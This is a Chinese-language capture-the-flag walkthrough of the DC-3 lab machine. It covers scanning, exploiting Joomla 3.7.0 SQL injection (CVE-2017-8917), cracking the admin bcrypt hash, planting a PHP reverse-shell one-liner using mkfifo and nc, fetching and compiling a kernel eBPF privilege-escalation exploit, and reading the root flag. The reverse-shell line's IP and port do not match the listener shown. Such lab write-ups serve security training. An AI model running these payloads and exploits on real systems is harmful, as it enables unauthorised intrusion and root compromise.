渗透测试—DC_3
一、解决靶机没有IP
故事是这样的,当我兴高采烈的导入了 ova 之后,拿着自己写的 ARP扫描 脚本,结果只扫到了自己的网关等,郁闷之余又搞了一下好久不弄的重置密码,当然这里不是真的重置密码,只是修改一下网络配置文件…
首先开机,在出现引导的时候,按下 e 键
然后就出现下面的界面:
这里需要找到以 Linux 开头,以 ro 结尾的那行,将 ro 改成下面图中的代码
#这条命令的作用是
rw single init=/bin/bash然后就可以使用 root单用户 登录进来了,然后修改/etc/network/interfaces` 文件,这里的原因是配置文件中的接口与实际的系统接口不同导致的,所以只需要将系统配置文件中的接口名称修改成系统的接口名称即可
修改后使用 /etc/init.d/networking restart 重启一下网络
可以看到这个时候已经有 IP地址了
二、主机扫描
使用之前写的 ARP扫描 脚本进行扫描,这里去除了 MAC 的显示
[root@localhost Desktop]# python3 Arp_Scan.py 10.87.51.0/24
IP: 10.87.51.1
IP: 10.87.51.2
IP: 10.87.51.21
IP: 10.87.51.254
[+] 本次扫描共花费 1.706566333770752 秒发现 IP 地址与在重启设备前看到是一样的.
使用 Nmap 进行扫描
root@kali:~# nmap -sV -p- 10.87.51.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 20:49 EDT
Nmap scan report for 10.87.51.21
Host is up (0.00076s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open ssl/http Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:63:0D:34 (VMware)
Service detection performed. Please report any incorrect re发现之开启了 80 端口,访问链接,查看源代码发现是 Joomla 服务
Joomla! - Open Source Content Management于是是用 Joomscan 进行扫描
root@kali:~# joomscan -u http://10.87.51.21
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] admin finder
[++] Admin page : http://10.87.51.21/administrator/
#我忽略了不太重要的信息三、漏洞利用
通过 Google 发现了 Joomla_V3.7 有 SQL注入 漏洞,对应 CVE-2017-8917 ,在 Github 上有对应 exp
https://github.com/stefanlucas/Exploit-Joomla.gitroot@kali:~# python joomblah.py http://10.87.51.21
[$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']查看 hashid
root@kali:~# cat 1.txt | hashid
Analyzing '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt使用 john 破解
root@kali:~# john 1.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy (?)
1g 0:00:00:00 DONE 2/3 (2020-04-21 21:48) 3.846g/s 138.4p/s 138.4c/s 138.4C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# john 1.txt --show
?:snoopy
1 password hash cracked, 0 left这里得到了密码: snoopy,使用账户:admin 登录,编辑下面的站点
http://10.87.51.21/administrator/index.php?option=com_templates&view=template&id=506&file=L2luZGV4LnBocA
添加下面的
system('rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 10.87.51.21 9999 >/tmp/bd')反弹 shell
oot@kali:~/Desktop# nc -lnvp 7777
listening on [any] 7777 ...
connect to [10.87.51.17] from (UNKNOWN) [10.87.51.21] 57164
bash: cannot set terminal process group (1328): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html$
www-data@DC-3:/var/www/html$ pwd
pwd
/var/www/html
www-data@DC-3:/var/www/html$ whoami
whoami
www-data四、提权
root@kali:~# searchsploit "linux Kernel 4.4.x (Ubuntu 16.04)"
--------------------------------------------------------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
--------------------------------------------------------------------------------------然后在 https://www.exploit-db.com/exploits/39772找到提示,到下面这个地址下载
https://bugs.chromium.org/p/project-zero/issues/detail?id=808然后将 exploit.tar 下载到目标机器中
www-data@DC-3:/tmp$ wget http://10.87.51.17/exploit_2.tar
wget http://10.87.51.17/exploit_2.tar
--2020-04-22 13:31:19-- http://10.87.51.17/exploit_2.tar
Connecting to 10.87.51.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit_2.tar'
0K .......... .......... 100% 75.2M=0s
2020-04-22 13:31:19 (75.2 MB/s) - 'exploit_2.tar' saved [20480/20480]然后解压
www-data@DC-3:/tmp$ tar -xvf exploit_2.tar
tar -xvf exploit_2.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c执行编译操作
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
#提示的warning不用管,这时候已经生成新的文件了www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
exp
hello
hello.c
suidhelper
suidhelper.c然后执行新产生的 doubleput 文件,获取 root 权限
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -al
total 32
drwx------ 2 root root 4096 Mar 26 2019 .
drwxr-xr-x 22 root root 4096 Apr 22 04:26 ..
-rw------- 1 root root 67 Mar 26 2019 .bash_history
-rw-r--r-- 1 root root 3106 Oct 23 2015 .bashrc
-rw------- 1 root root 71 Mar 23 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw------- 1 root root 2889 Mar 26 2019 .viminfo
-rw-r--r-- 1 root root 604 Mar 26 2019 the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
